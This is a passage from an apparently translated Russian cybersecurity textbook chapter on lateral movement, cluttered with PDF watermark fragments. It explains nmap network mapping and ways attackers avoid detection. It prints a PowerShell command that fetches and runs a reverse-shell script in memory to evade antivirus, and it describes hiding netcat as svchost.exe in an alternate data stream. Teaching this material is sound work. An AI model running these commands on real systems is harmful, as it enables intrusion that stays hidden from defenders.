|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
||
|
|
X |
|
|
|
|
|
||
|
- |
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||
|
|
|
|
|
|
|
|||
|
|
|
|
|
BUY |
|
|
||
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
m |
||||
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
|
e |
|
|
|
|
|
|
|
n |
|
|
||
|
|
|
|
|
|
Глава |
|||
|
|
|
|
-xcha |
|
|
|
||
7
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
Дальнейшее распространение по сети
В предыдущих главах мы обсудили средства и методы, которые злоумышлен- ники используют для компрометации и получения доступа к системе. В этой главе основное внимание будет уделено тому, что они пытаются сделать пос ле успешного входа, укрепляя и расширяя свое присутствие. Это называется дальнейшим распространением по сети. Злоумышленники будут переме- щаться с устройства на устройство после первоначального взлома с надеждой получить доступ к ценным данным. Они также будут искать пути получения дополнительного контроля над сетью жертвы и в то же время будут старать- ся избежать сигнала тревоги или срабатывания какого-либо предупреждения. Эта фаза жизненного цикла атаки можетзанятьмного времени.В случае очень сложных атак у хакеров уходит несколько месяцев, чтобы добраться до жела- емой цели.
Дальнейшее распространение по сети включает в себя сканирование сети на предмет других ресурсов, сбор и эксплуатацию учетных данных или сбор дополнительной информации для просачивания. Дальнейшее распростране- ние трудно остановить, потому что организации обычно устанавливают меры по обеспечению безопасности на нескольких шлюзах сети. Следовательно, злонамеренное поведение обнаруживается только при переходе между зона- ми безопасности, но не внутри них. Это важный этап в жизненном цикле ки- беругроз, поскольку он позволяет злоумышленникам получать информацию и повышать уровень доступа, что более опасно. По словам экспертов по ки- бербезопасности, это самая критическая фаза атаки, поскольку именно здесь злоумышленник ищетресурсы,дополнительные привилегии и перебираетне- сколькосистем,дотехпорапоканеудовлетворитсятем,чтодостигсвоейцели.
В этой главе будут рассмотрены следующие темы:инфильтрация;построение карты сети;
как избежать оповещений;дальнейшее распространение.
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
142 Дальнейшее распространение по сети |
|||||
w Click |
|
|||||||||
|
|
|
|
|
|
m |
||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
||
|
|
|
|
|
|
Инфильтрация |
||||
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
В предыдущей главе мы обсуждали усилия, предпринимаемые хакерами при проведенииразведки,чтобыполучитьинформацию,котораяможетпозволить им проникнуть в систему. Методы внешней разведки – это копание в мусоре, использование социальных сетей и социальная инженерия.При копании в му- сореможнособратьценныеданныесустройств,утилизированныхкомпанией. Мы убедились, что социальные сети можно использовать для слежки за жерт- вами и получения учетных данных, которые они могут по невнимательности оставлять. Мы также обсудили различные атаки с использованием социаль- ной инженерии,которые ясно показали,что злоумышленник может вынудить пользователя выдать учетные данные для входа. Причины, по которым поль- зователиклюютнатакиеспособы,былиобъяснены спомощьюшестирычагов, используемых в социальной инженерии.
Обсуждались методы внутренней разведки, а также инструменты, исполь- зуемые для прослушивания и сканирования информации, которая может по- зволить злоумышленнику получить доступ к системе. Используя эти два типа разведки,злоумышленник сможетполучитьдоступ к системе.Важный вопрос, который должен последовать вслед этим: что может сделать злоумышленник с этим доступом?
Построение карты сети
После успешной атаки злоумышленники попытаются обнаружить в сети хос ты, содержащие ценную информацию. Здесь есть ряд инструментов, которые можно использовать для идентификации хостов, подключенных к сети. Один из наиболее часто используемых–это nmap,и в этом разделе мы объясним воз- можности отображения,которыми он обладает.Эта утилита,как и многиедру- гие,перечислитвсехосты,которыеонанайдетвсетивпроцессеихпоиска.Она запускается с помощью команды сканирования всей подсети:
#nmap 10.168.3.1/24
Сканирование также может быть выполнено для определенного диапазона IP-адресов следующим образом:
#nmap 10.250.3.1-200
Ниже приведена команда,которая может использоваться для сканирования определенных портов:
#nmap -p80,23,21 192.190.3.25
Получив эту информацию, злоумышленник может определить операцион- ную систему, работающую на интересующих его компьютерах в сети. Если ха- кер может указать операционную систему и конкретную версию, запущенную на целевом устройстве,будетлегко выбратьинструментыдля взлома,которые можно эффективно использовать.
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
|||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
|
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
Инфильтрация 143to |
BUY |
|
|
||||||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
w Click |
|
|
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
|
m |
||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
|||||||
|
|
p |
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
-xcha |
|
|
|
|
Нижеприведенакоманда,используемаядляопределенияоперационнойси- |
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
|||||
стемы и версии, запущенной на целевом устройстве:
#nmap -O 191.160.254.35
nmap обладает сложными возможностями определения ОС по характерным признакам и почти всегда сможет рассказать нам об операционных системах устройств,таких как маршрутизаторы, рабочие станции и серверы.
Причина, по которой построение карты сети возможно и в значительной степени легко осуществимо, заключается в проблемах, связанных с защитой от сканирования. У организаций есть возможность полностью защитить свои системы,чтобыпредотвратитьподобныесканирования,выполняемыеnmap,но в основном этоделается с помощью сетевой системы обнаружения вторже-
ний (NDIS). Когда хакеры сканируют отдельные цели, они делают это из ло- кального сегмента сети и таким образом избегают прохождения через NDIS. Чтобы предотвратить сканирование,организация может выбрать системы об- наружения вторжений на базе хостов,но большинство сетевых администрато- ров не рассматривает возможности делать это в сети, особенно в том случае, если количество хостов очень велико.
Расширение систем мониторинга на каждом хосте приведет к увеличению количества предупреждений и потребует большей емкости хранилища. В за- висимости от размера организации это может вылиться в терабайт данных, большинство из которых будут ложными срабатываниями. Помимо этого, существует проблема, заключающаяся в том, что группы по обеспечению ин- формационной безопасности в организациях располагают достаточными ре- сурсами и силой воли для расследования в среднем 4 % всех предупреждений, касающихся кибербезопасности, генерируемых системами безопасности. По- стоянное обнаружениеложных срабатываний в больших количествахтакже не позволяет этим группам отслеживать угрозы, обнаруженные в сетях.
Принимая во внимание проблемы мониторинга деятельности, связанной с боковым смещением, лучшее, на что могут надеяться компании-жертвы, – это решения для обеспечения безопасности на базе хостов.Тем не менее хаке- ры обычно приходят с оружием, чтобы отключить или ослепить их.
Избежать оповещений
На этом этапе злоумышленнику следуетизбегатьподнятиятревоги.Если сете- вые администраторы обнаружат, что в сети существует угроза, они тщательно зачистят ее и аннулируют любое продвижение, достигнутое злоумышленни- ком. Многие организации тратят значительные суммы на системы безопас- ности,чтобысхватитьзлоумышленников.Средстваобеспечениябезопасности становятся все более эффективными и могут идентифицировать множество сигнатур хакерских утилит и вредоносных программ, которые те используют. Следовательно, это требует от злоумышленников разумных действий. Среди хакеров существует тенденция использовать легитимные средства для даль- нейшего распространения по сети. Это утилиты и методы, которые известны
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
BUY |
|
|
||||||||
|
|
|
|
to |
144 Дальнейшее распространение по сети |
|
|
|
|
to |
|
|
|
|
|
|
|||||||
w Click |
|
w Click |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
m |
|
|
|
|
|
|
|
m |
||||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
|
|
системе или являются ее частью и, следовательно, обычно не представляют |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
||||
угрозы. Поэтому системы безопасности игнорируют их.
Эти инструменты и методы позволили злоумышленникам перемещаться в защищенных сетях прямо под носом у систем безопасности.
Ниже приведен пример того, как злоумышленники могут не дать обнару- жить себя с помощью PowerShell. Вы увидите, что вместо загрузки файла, ко- торый будет сканироваться антивирусной системой жертвы, используется Po werShell.Он напрямую загружает в память файл PS1 из интернета,вместотого чтобы скачать его на диск, а затем загрузить:
PS > IEX (New-Object Net.WebClient).DownloadString(‘http:///Invoke-PowerShellTcp.ps1’)
Такая команда предотвратит пометку загружаемого файла антивирусными программами. Злоумышленники также могут использовать альтернативные потоки данных (ADS) в файловой системе Windows NT (NTFS), чтобы избе- жатьоповещений.ИспользуяADS,злоумышленникимогутскрыватьсвоифай- лы в допустимых системных файлах,что может быть отличной стратегией для перемещениямеждусистемами.СледующаякомандаскопируетNetcat (https:// github.com/diegocr/netcat) в допустимую утилиту Windows под названием Calculator (calc.exe) и изменит имя файла (nc.exe) на svchost.exe. Таким образом, имя процесса не вызовет никаких подозрений, поскольку это часть системы.
Рис.7.1
Если вы просто используете команду dir для вывода списка всех файлов в этой папке,то не увидите файл.
Однако если вы используете утилиту streams с сайта Sysinternals,то сможете увидеть все имя полностью.
Дальнейшее распространение
Дальнейшее распространение может осуществляться с использованием раз- ных методов и тактик. Злоумышленники используют их для перемещения по сети с одного устройства на другое. Их цели – усиление своего присутствия в сети и получение доступа ко множеству устройств, которые либо содержат ценную информацию, либо используются для управления такими важными функциями, как безопасность. В этом разделе мы рассмотрим самые распро- страненные инструменты и тактики.
Сканирование портов
Это, вероятно, единственный старый метод, который остался в арсенале ха- керов. Он практически не изменился, поэтому выполняется одинаково с по-